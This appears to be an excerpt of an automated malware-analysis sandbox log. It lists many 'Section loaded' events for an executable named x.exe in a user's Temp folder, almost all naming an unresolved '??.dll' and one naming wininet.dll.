Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
